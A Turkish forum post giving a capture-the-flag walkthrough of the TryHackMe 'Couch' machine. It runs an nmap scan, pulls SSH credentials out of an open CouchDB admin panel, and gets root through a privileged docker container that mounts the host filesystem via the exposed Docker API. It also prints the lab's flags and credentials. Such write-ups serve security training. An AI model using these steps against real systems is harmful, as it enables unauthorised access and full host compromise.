THM Couch WriteUp

Pytang

Katılımcı Üye
18 Eki 2014
317
327
subdomain
3_apache-couchdb.c45e15f55f.jpg

Merhaba arkadaşlar. Bu gün THM'deki başlangıç seviye bir makinenin çözümünü göstereceğim.

İlk olarak Nmap taraması yaparak başlıyoruz.

nmap -sS -sV MakineIP
Kod:
PORT     STATE SERVICE
22/tcp   open  ssh
5984/tcp open  couchdb

2 tane portun açık olduğunu öğrenmiş olduk bunlar 22 - SSH ve 5984 — COUCHDB.

Tarayıcımızın adres çubuğuna http://makineIP:5984/ yazıyoruz ve karşımız şöyle bir sayfa çıkıyor.

8q9f01t.PNG

/_all_dbs yazarak mevcut tüm veritabanlarını görüntüleyebilir veya doğrudan /_utils üzerindeki yönetim paneline gidebiliriz.

Tarayıcımızın adres çubuğuna http://MakineIP:5984/_utils/ yazıyoruz ve yönetim paneli karşımıza çıktı.

fdnmfud.PNG

Bu databasede secret(gizli) adı olan bir veri var bu verinin içerisine girip ne olduğuna bakıyoruz.

Bizi a1320dd69fb4570d0a3d26df4e000be7 böyle bir şey karşılıyor ve içine giriyoruz /secret/a1320dd69fb4570d0a3d26df4e000be7

İçine girdiğimizde bize bir kullanıcı adı ve şifre veriyor (atena:t4qfzcc4qN##) bunu sisteme SSH yardımıyla bağlanırken kullanabiliriz.

Terminale gelip ssh atena@makineIP yazıyoruz ve daha sonra bizden istediği şifreyi (t4qfzcc4qN##) giriyoruz artık makineye bağlandık.

Home dizinindek user.txt dosyası var bunu cat komutuyla açıyoruz bize hedefimizi verdi (THM{1ns3cure_couchdb})

23ifwyg.png

Şimdi makinede yetkimizi yükseltmemiz gerekiyor, terminale -ls -la yazıyoruz ve bize atena'nın içerisindeki dosyaları gösteriyor.

Burada .bash_history adlı bir dosya var bu dosyayı terminale cat .bash_history yazarak açıyoruz.

Kod:
cat ~/.bash_history
...
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
...

Bu, atena'nın 2375 numaralı bağlantı noktasındaki docker'a erişebileceği anlamına geliyor. GTFObin'de docker'ı aradım ve buradaki shell komutunu kullanarak yetkimi yükselttim ve root dosyasını açtım. :

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Kod:
docker -H 127.0.0.1:2375 run --rm -it --privileged --net=host -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{RCE_us1ng_Docker_API}

CTF CEVAPLARI:

tpde85l.PNG

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.